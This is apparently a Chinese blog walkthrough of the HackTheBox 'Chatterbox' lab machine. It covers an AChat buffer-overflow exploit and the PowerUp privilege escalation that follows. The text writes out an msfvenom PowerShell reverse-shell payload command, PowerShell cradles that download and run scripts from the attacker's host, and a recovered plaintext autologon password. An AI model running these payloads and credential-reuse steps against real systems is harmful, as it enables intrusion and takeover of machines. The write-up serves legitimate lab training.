HackTheBox-windows-Chatterbox

靶机地址：https://www.hackthebox.eu/home/machines/profile/123

靶机难度：中级（4.0/10）

靶机发布日期：2018年6月16日

靶机描述：

Chatterbox is a fairly straightforward machine that requires basic exploit modification or Metasploit troubleshooting skills to complete.

请注意：对于所有这些计算机，我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机的IP是10.10.10.74.....

nmap发现运行了9255http的服务...还发现存在缓冲区溢出漏洞...

无法访问...400，回头发现运行了Achat服务器上...

存在漏洞，有个python能利用...试试

修改地址后...

可以看到这是建立在windows系统上的缓冲区溢出...这里可以利用powershell方向链接靶机...GO

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.18 LPORT=6666 -e x86/unicode_mixed -b 'x00x80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff' BufferRegister=EAX -f python

利用achat漏洞创建windows上powershell的反向shell...但是问题来了，可以看到16974 bytes，Payload 3556，大于1100个字节就不能使用有效负荷了...继续修改...

生成MSFbuf...

准备好上传的shell...

将shell填入即可....

验证正常的...go

通过powershell反向shell成功上传了...获得了低权...

获得user.txt...

这里有点取巧了，目前我还在低权Alfred用户下，发现administrator下desktop的权限是可以看到root.txt文件的...但是我进去查看内容无法查看...看到我和system高权用户权限是一样的...

可以看到，这里直接在低权用户利用icacls获得了root信息...这是人员管理用户给权限的漏洞... （cacls  Windows实用程序，用于查看/编辑文件权限）

虽然拿到了信息...但是还是要讲述怎么拿到system权限的...继续

目前具有PowerShell会话，可以使用PowerUp进行提权...

git cloun https://github.com/PowerShellMafia/PowerSploit

下载后上传使用即可...

IEX(NEW-Object Net.webClient).downloadString('http://10.10.14.18/dayu.ps1')

因为在powershell下，直接上传...

Invoke-AllChecks

可以看到利用PowerUp看到了隐藏在注册表中的一组自动登录凭据...

DefaultUserName      : AlfredDefaultPassword      : Welcome1!

这里创建一个凭据变量来存储密码...就是告诉PowerShell将先前找到的密码存储在纯文本中，并强制将其保存...

然后创建一个名为cred的新变量，并将其用于登录...

直接在利用提权的shell即可...

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/dayushell.ps1')"  -Credential $cred

可以看到成功获得了administrator用户权限...

通过尝试使用Administrator帐户重用此密码是成功的，使用powershell或打开SMB并使用impacket的psexec来实现了...完美

这里也能成功获得了root信息...

这里介绍了几种方法，大家多多操作，加油！

当然，开局的时候官方的给的方法是：Chatterbox是一台非常简单的机器，需要基本的漏洞利用修改或Metasploit故障排除技能才能完成。

我这里没使用Metasploit进行渗透的...说明Metasploit肯定还有方式方法能进行提权.. 

这里有专研精神的，可以继续专研下去，这里可以利用Metasploit获得root信息...GO

由于我们已经成功得到root权限查看user.txt和root.txt，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。